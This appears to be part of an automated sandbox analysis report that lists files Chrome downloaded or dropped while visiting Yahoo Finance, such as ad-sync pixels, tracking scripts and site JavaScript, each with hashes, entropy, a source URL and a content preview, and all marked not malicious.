                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cerebro.edna.yahoo.net/noquery/pixel.gif?rand=xkme2lc4o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3338
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.925806763050561
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:ceSTG3llo4Juco75PPPK9iiYzQHglCMhApOS:cJcJu7PPK9ivzQZR/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0D085DBBFB13EE615A4BB788243F87CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:19B10E56B69F1BB07507DCDC425052DC602E3608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:32E88B201B73007C95C4792414C44789793D0E309CFA7AB0DD522584C8471699
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BACA07D3815A20A0988589A27BC761372C6E09B8C1794B9CB0FF80FC70853DA3C3CD468F5CAA1CECC2A16EDC8C2A8512E1D0F4CCE9DF09D9D81ABB1F9079F77B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq.....IDATx^.Z.WTG...3g~.,I&.3.L\X....F...s.D.I...8*.4.fU. ..A.d......E...e.e.n.....Z%$......w..^......[o............{....52......>....&k..w..Z..6....o>...v.......xc6........5.....m...x.h...Q....pX#."..%.K.{..R...e.../j=.m=.2...1@X....chc.v1.o}G....>'......K89.|.IR0A.. ..c....P....A-./".+.".n_....M....+.........|.?.>....4l..ptCH..g.L...i../...x.c..[...f?....'...0...\-.a....p.........c..q.M..<..D.....i.FW...n.Dw....j....[...9..[.....02...&f..j..q5.N.A.r.7..a..0...F.ao.........E.D[d,.#.h...=.[tE.3r.l...j..lX.d...d..w........JT4,C....u.../.U.....^d2.".a.I.#.wcS.&.....x..?...j.t..?6}....(m....\........Qx.5r.E.](.....1r.n..|.AT[.2M.u.~u.P..l .3).....Ga.F..G.q..W8u.=..o....p.v.2.~......q.....>...Gp!*.W.2Q.m&...Ea\...x4...p.....[..H.......]U. .j+R..".H....Q.p(*..#....dDd.DL.NF.FVL6.lg.......pN.....P...{....;;.x'..5V......XD.QUVD...(......>.=;..;..{".{[..EH..Gjt.......k<..M_...[....x.N...Dl.........Dl.d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 79 x 38, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.022997040570905
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPl6Zt/1IV/xl/k4E08up:6v/lhPqKl7Tp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1805D995B50A2F2C26201E8290CBF705
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:76B7B793A5353A24E46372B8C8E899F1829ED148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7CF7D05023F0700848C65665F70BD76BA87BDA35838B2FA6CF4FFFAE8F91F21B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:633345136FC250B0A6733FBC47F2E37585ED90C6505D7B0BAE97C79B46F531F1CB73A69E7280C506348519DE2EC897A857E5AA5C879EF8DAD509B18BF73EA908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8cf87240ceda19cb/1728414789424/DynHffhfYX2zijG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...O...&.......QC....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?&p=156423&us_privacy=&predirect=https%3A%2F%2Fevents-ssc.33across.com%2Fmatch%3Fliv%3Dh%26us_privacy%3D%26bidder_id%3D25%26external_user_id%3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.496574330097901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:C/2A3njBWk9JyiA:C/nXjB7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1B177A4068E01AC77B85B091C87251BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA7A08A7C139D4A7512B6BAAB5AAC4A3E288B255
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F77F47058428A1C21DAD5A75AC13FBFDEB9858947218FEE2112FDED5972A0B5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6E6D693775AA9C94540D0CA0549C98446048189D49A3716895F62C3EFE3893F0B28FEDACDCD46394782B7972D0B981E87EA291E76EF2490258FCABA2A0906D92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://gum.criteo.com/sync?r=2&c=321&gdpr=0&gdpr_pd=0&gdpr_consent=&us_privacy=&j=window.advBidxc.mnetRtusId
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:window.advBidxc.mnetRtusId({"status":"Unknown","userid":""});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):27697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.932911162577583
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:KYyN4vWpS2KoOkzd1T7aK0jDQs35SkG2CeaEuzfk8qLXCZ:KYEzTbs3kPEwfk8n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:54AC09EEC50E8659FD774B7747DF7888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E6C87A3D2F55430B6BD3B62C051743B7C7BDD7D5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B047238D9EF36BA7805D53CACC34554C2D0CBBAAB1B99CF4764FA4E9511B8994
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E497651554D63B8AC137FCBE990158C56ACB1D80E4B5C3AD18DC0FED9F245C9066A4B5A4561AD024D7EC218B53F9A2D50C4BCB41438168510A921DFE7E3D17DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (60378), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60378
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.226751934675976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:DwUHzI01OwxqmIGAKoMuXpTteneKJ4jf0V:DHXm50j
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C1FBB54C4F22838F40CE99E7418FCD97
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:62D8945137AE75C185903E0552C920E03E5577E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C17C2FCA2732465B44F96FE2E566A4E016E4A56D7C40169E5E84F501BA750E5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C5178DF676E1BD912502AC86DE7E270B76FD321B229E320754E455AD6620FCEDCFED5515AA9192ECA09074E892916978E0A3F412C6C8757AEC88900566C56B48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer",[],t):"object"==typeof exports?exports.wafer=t():e.wafer=t()}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (11090)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.370414395163306
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:WjN3tsWtOu2msfio8jSeIIzUB0MIb7ubYufAyh8qYSptHO05NcIw7VxS8aZ2lyzG:WjNWutxumQnIbiYufhhPtHO6CO8ms8gR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:208DEF83F87951FBD4145A8A2CD25134
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FD2AF4ED1CB2714A2391E17640A26EF31E345BCA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EEFF9DF15E40621CC4B9B48EF9BEC776F60B632AD10618EB208F3494DA5235B7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:03F870C3ED8DFF56ABF0D17AC5977B791FA317D8114AF046B59A14CC8DBF9D0A7C01E4BDEAEEDDD31821E2AE0D0ADB528B6B1710716CEA3B744B0C9040FF469B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/nodes/2.ByyLg9CL.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{B as se,n as B,r as x,g as W,t as T}from"../chunks/commonUtil.CI22_Irn.js";import{s as R,p as N,k as b,i as d,e as I,b as E,d as L,f as z,j as v,W as re,q as D,U as H,l as C,G as ie,t as V,h as G,n as j,o as ee,N as J,c as le,u as fe,g as ae,a as oe,H as me,z as ue}from"../chunks/scheduler.Dr9AAxFe.js";import{S as q,i as F,t as p,g as P,a as _,e as M,c as w,b as y,m as h,d as A}from"../chunks/index.DCSmZEjO.js";import{p as pe}from"../chunks/stores.DPDRpTFd.js";import{A as ce,P as $e,b as _e,G as ge,M as de,D as be,C as ke,a as we}from"../chunks/PageProgressBar.BGwewH1i.js";import ye from"../chunks/Ads.Bxzxpy-0.js";import{H as he}from"../chunks/Header.Db1Xn_Q6.js";import{L as te}from"../chunks/Link.Cll6KZpb.js";import{B as Ae}from"../chunks/Button.DpT5MMuf.js";import{C as Ee}from"../chunks/close.C3ug6nNR.js";import{T as ne}from"../chunks/Typography.BwmQDYSG.js";const ve=!1,Oe="always",Se=async({data:l,url:t})=>{const{crumb:n="",headerResponse:e,pages:s,portfolios:a,session:u,serv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (27104)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.361148094990428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:af8/g/Nl1s/stRfo0B2FwyNxdYKriRzCsvFvCuQ:afUoNlM0fYrDuCuQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C4F8F606E8D26E30B45D83965E4C0905
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F791F5B936EAC352D7F483A12450E6B9DD064772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:27A7C1F2F2C7018314D78B422F71E0EDA4F6904F261E36D93956F65E308D82EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:11F3BB13686F77E0D40829826CC45A1E456978FFFCB0677FA16F1E1AE9C2A1558A2048FF376D9B486B5263D8572367FF2031F9A07F3DCAB152A69FF15D98EAC2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var comments = 'User-Sync: generated: 2024-09-25 20:33:51 PDT';.var rtb_sync = {"consent_rate":100,"reset_rate":0,"ttl":14,"sample":100,"max_pixels":16,"pixel_sets":{"rtb":{"sample":100,"pixels":{"1185":{"ttl":7,"img":"https:\/\/ad.turn.com\/r\/cs?pid=6","secure":{"img":"https:\/\/ad.turn.com\/r\/cs?pid=6"},"priority":7,"partner":"amobee"},"1902":{"priority":17,"ttl":2,"img":"https:\/\/cms.quantserve.com\/pixel\/p-e4m3Yko6bFYVc.gif?idmatch=0","secure":{"img":"https:\/\/cms.quantserve.com\/pixel\/p-e4m3Yko6bFYVc.gif?idmatch=0"},"partner":"quantcast"},"1986":{"priority":7,"ttl":1,"img":"https:\/\/ib.adnxs.com\/getuidnb?http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30","secure":{"img":"https:\/\/secure.adnxs.com\/getuidnb?https%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30"},"partner":"xandr"},"2046":{"priority":13,"ttl":7,"img":"https:\/\/token.rubiconproject.com\/token?pid=2046&pt=n&a=1",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):120647
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.898021609390245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:VKKk5Ma+xeAQE5c84u57nF9B4w9j1st3UKD4eCsDAxwoCkNOcZpE3inFBxBMBqAJ:VBeE32armSOcZpvWBhMO5sep0RBG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:854B0520D7D9298011B2D4A71949A4A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1DD3CCCEE85AC8693613F719B3C3B39D08EF412B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B4F4590846B6205817F6FD845FDB1EF746EEFDA3E50618A749188D41EE5B9310
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B69A739E7FE719F97524FD8FAEEC0B6CE373293680A1DEE07B47AD93AF0A3DF3DDB630E6DD7F44085BA277CA32D8E7DBFF135A795FD4D99A9B066F3C8BF543D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:document.write('\x3cdiv id\x3d\x22brand_safety_q4QFZ9KEM7CZjuwPwN7cgQU\x22 style\x3d\x22visibility:hidden\x22 \x3e\x3cscript data-jc\x3d\x2288\x22 data-jc-version\x3d\x22r20241003\x22 data-jcp-jscd\x3d\x22[\x26quot;https://cdn.doubleverify.com/dvbm.js\x26quot;,\x26quot;ctx\x3d20006197\\u0026cmp\x3d31049690\\u0026sid\x3d5071708\\u0026plc\x3d382132454\\u0026crt\x3d207926178\\u0026advid\x3d3876774\\u0026adsrv\x3d1\\u0026mon\x3d1\\u0026blk\x3d1\\u0026dvp_cawf\x3dcrtwrp\\u0026cm360cw\x3d1\\u0026unit\x3d728x90\\u0026prr\x3d1\\u0026turl\x3dhttps://finance.yahoo.com/markets/crypto/all/\\u0026aucmp\x3d20678044986\\u0026auevent\x3dABAjH0jBI5NoWyFvIXMOtDRNBpU0\\u0026autt\x3d1\\u0026ppid\x3d103\\u0026aubndl\x3d\\u0026aucrtv\x3d536029563\\u0026auorder\x3d1014837928\\u0026pltfrm\x3d1\\u0026ausite\x3d6613965583\\u0026auxch\x3d1\\u0026aufilter1\x3d1982032\\u0026c1\x3d1982032\\u0026audeal\x3d\x26quot;,null,\x26quot;doubleverify\x26quot;,null,\x26quot;q4QFZ9KEM7CZjuwPwN7cgQU\x26quot;,\x26quot;https://go
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):145030
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.754450201475022
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:QYKk5Ma+xeAQE5aoP42TlExu5VyvX4w9j1st3UKD4eCsDAxwosoV42nOpx3inhb2:QreEm2REjAarmH2nOpbU6ltmKbD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:81426760F7144CA3D50DF7EC19377848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A4BF032767912938D5506342E649C108492DB557
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:25B6CCA41EA7FFA467D72A150165D80EF2FAF9ADC0968A9C8026DA2E5D86FD04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CC33A155E8B2802E1CEF8C192E0A07EDB922B0EC02FC46A18625ED2F278E8306782DBD21EEACF669FEC5C74B78F10522DD30BD9B9AFA74A252457639810C67B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              